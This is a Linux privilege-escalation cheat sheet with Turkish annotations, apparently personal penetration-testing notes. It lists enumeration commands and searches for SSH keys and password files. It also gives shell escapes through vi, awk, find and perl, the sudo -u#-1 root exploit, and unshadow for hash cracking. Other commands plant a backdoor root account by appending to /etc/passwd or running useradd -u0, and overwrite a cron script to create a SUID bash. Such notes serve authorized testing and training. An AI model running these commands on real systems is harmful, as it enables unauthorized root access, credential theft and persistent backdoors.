-------------------------------------------------------------------
whoami : Kullanıcıyı öğrenmek
uname -a : Kernel versiyonunu öğrenme
ps aux : Çalışan süreçleri ve servisleri gösterir.
netstat -ant : Portları kontrol eder.
netstat -tunap : çalışan portlar ve servisler hakkında bilgi verir.
ifconfig : İnterfaceleri görüntüler
ip route : Karmaşık ağlarda routing tablosunu görüntüler.
arp -a : Arp tablosunu görüntüler.
cd /etc/cron.d/ : cron dosyalarına bakar

----------------------------------------------------------------------
find / -name id_rsa 2>/dev/null
find / name=password : password adında dosyaları bulur.
find / -name password 2>/dev/null
find / -perm -u=s -type f 2>/dev/null #suid  bit
find / -user root -type f 2>/dev/null
find . -type f -maxdepth 4 | xargs grep -i "password"
find / -type f -perm -04000 -ls 2>/dev/null : suid bit.
locate -i password : password adında dosyaları getirir.
find / -writable -type d 2>/dev/null : yazılabilir klasörleri gösterir.
find / -user root -type f 2>/dev/null  
find / -executable -type f 2>/dev/null : yazılabilir dosyalar

---------------------------------------------------------------------
cat history : Geçmişte girilen komutlar.
cat /etc/crontab : crontabe bakar.
cat /proc/version : cihaz versiyonları öğrenme
cat /etc/issue : İşletim sistemi hakkında bilgi alma
cat /etc/*-release : işletim sistemi hakkında detaylı bilgi verir.
cat /etc/passwd : Kullanıcıları görürüz.
cat <dosya> | grep -i -E "<dosyaiçerisindearanacakelimeler" / cat dosya.txt | grep -i -E "root|acces|password"
----------------------------------------------------------------------
sudo /usr/sbin/apache2 -f /etc/shadow
nmap–> –interactive
vi–> :!bash
sudo vim -c ':!/bin/sh'
awk–> awk ‘BEGIN {system(“/bin/bash”)}’
find–> find / -exec /usr/bin/awk ‘BEGIN {system(“/bin/bash”)}’ \;
perl–> perl -e ‘exec “/bin/bash”;’
ps aux | grep root
sudo -u#-1 /bin/bash : sudo versiyon açığı ile root olma root olana kadar sayı yı değiştir. örneğin : sudo -u#-2 /bin/bash  
---------------------------------------------------------------------------
unshadow passwd.txt shadow.txt : passwd ve shadow dosyalarını birleştirir.
---------------------------------------------------------------------
*python os.system(/bin/bash)
*sudo -l
*ls -la /etc/cron*
*ls -la ~/.ssh/
---------------------------------------------------------------------------
++ openssl passwd -1 -salt kali antivir_1234
# to create a second root user with "mrcake" password

echo "kali:<cıkan hash buraya gelecek>:0:0:root:/root:/bin/bash" >> /etc/passwd

useradd -u0 -g0 -o -s /bin/bash -p "openssl passwd yourpass" rootuser
---------------------------------------------------------------------------
linux checkerlar :
	https://www.securitysift.com/download/linuxprivchecker.py
	https://github.com/InteliSecureLabs/Linux_Exploit_Suggester
--------------------------------------------------------------------------

linux pivoting :
ping db -c 1 // böylece diğer networklere ping atacak ve hangisinden cevap dönecek ona göre pivoting yapabileceğiz.
---------------------------------------------------------------------------
CRONTAB sh file :
	In command prompt type:
	echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
	In command prompt type: chmod +x /home/user/overwrite.sh
	Wait 1 minute for the Bash script to execute.
	In command prompt type: /tmp/bash -p
	In command prompt type: id 
